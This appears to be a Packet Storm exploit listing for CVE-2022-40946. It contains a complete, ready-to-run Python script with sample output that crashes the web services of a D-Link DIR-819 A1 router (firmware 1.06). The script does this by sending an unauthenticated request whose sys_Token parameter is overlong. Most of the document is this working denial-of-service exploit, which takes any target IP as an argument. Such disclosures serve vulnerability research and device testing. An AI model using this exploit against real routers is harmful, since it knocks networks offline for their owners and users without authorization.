D-Link DIR 819 A1 suffers from a denial of service vulnerability.
d31def06fe5379017866628710609236b500fbffbe463b2a1d1c3b252a7e3268# Exploit Title: DLink DIR 819 A1 - Denial of Service
# Date: 30th September, 2022
# Exploit Author: @whokilleddb (https://twitter.com/whokilleddb)
# Vendor Homepage: https://www.dlink.com/en/products/dir-819-wireless-ac750-dual-band-router
# Version: DIR-819 (Firmware Version : 1.06 Hardware Version : A1)
# Tested on: Firmware Version - 1.06 Hardware Version - A1
# CVE : CVE-2022-40946
#
# Github: https://github.com/whokilleddb/dlink-dir-819-dos
#
# $ ./exploit.py -i 192.168.0.1
# [+] DLink DIR-819 DoS exploit
# [i] Address to attack: 192.168.0.1
# [i] Using SSL: False
# [i] Request Timeout: 30s
# [i] Buffer Length: 19
# [i] Payload: http://192.168.0.1/cgi-bin/webproc?getpage=html/index.html&errorpage=html/error.html&var:language=en_us&var:menu=basic&var:page=Bas_wansum&var:sys_Token=6307226200704307522
# [+] Exploit Successful!
#!/usr/bin/env python3
import sys
import string
import urllib3
import requests
import argparse
import random
import socket
from rich import print
# Disable SSL Warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Globals
TIMEOUT = 30
#BUFFER_LEN = 19
BUFFER_LEN = 32
# Class to exploit
class Exploit:
def __init__(self, ip, is_ssl):
"""Initialize the constructor"""
self.ip = ip
self.is_ssl = is_ssl
_payload = f"{self.ip}/cgi-bin/webproc?getpage=html/index.html&errorpage=html/error.html&var:language=en_us&var:menu=basic&var:page=Bas_wansum&var:sys_Token={''.join(x for x in random.choices(string.digits, k=BUFFER_LEN))}"
if self.is_ssl:
self.payload = f"https://{_payload}"
else:
self.payload = f"http://{_payload}"
def show(self):
"""Show the parameters"""
print(f"[bold][[cyan]i[/cyan]] Address to attack: [green]{self.ip}[/green][/bold]")
print(f"[bold][[cyan]i[/cyan]] Using SSL: [green]{self.is_ssl}[/green][/bold]")
print(f"[bold][[cyan]i[/cyan]] Request Timeout: [green]{TIMEOUT}s[/green][/bold]")
print(f"[bold][[cyan]i[/cyan]] Buffer Length: [green]{BUFFER_LEN}[/green][/bold]")
print(f"[bold][[cyan]i[/cyan]] Payload: [green]{self.payload}[/green][/bold]")
def run(self):
"""Run the exploit"""
print(f"[bold][[magenta]+[/magenta]] DLink DIR-819 DoS exploit[/bold]")
self.show()
try:
r = requests.get(self.payload, verify=False, timeout=TIMEOUT)
if "Internal Error" in r.text:
print(f"[bold][[green]+[/green]] Exploit Successful![/bold]")
print(f"[bold][[green]+[/green]] Router services must be down![/bold]")
else:
print(f"[bold][[red]![/red]] Exploit Failed :([/bold]")
except requests.exceptions.Timeout:
print(f"[bold][[green]+[/green]] Exploit Successful![/bold]")
except Exception as e:
print(f"Error occured as: {e}")
def main():
"""Main function to run"""
parser = argparse.ArgumentParser(
description="DLink DIR-819 Unauthenticated DoS")
parser.add_argument('-i', '--ip', required=True, help="IP of the router")
parser.add_argument('-s', '--ssl', required=False, action="store_true")
opts = parser.parse_args()
try:
ip = socket.gethostbyname(opts.ip)
except socket.error:
print("[bold red][!] Invalid IP address[/bold red]", file=sys.stderr)
return
is_ssl = opts.ssl
exploit = Exploit(ip, is_ssl)
exploit.run()
if __name__ == '__main__':
main()
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed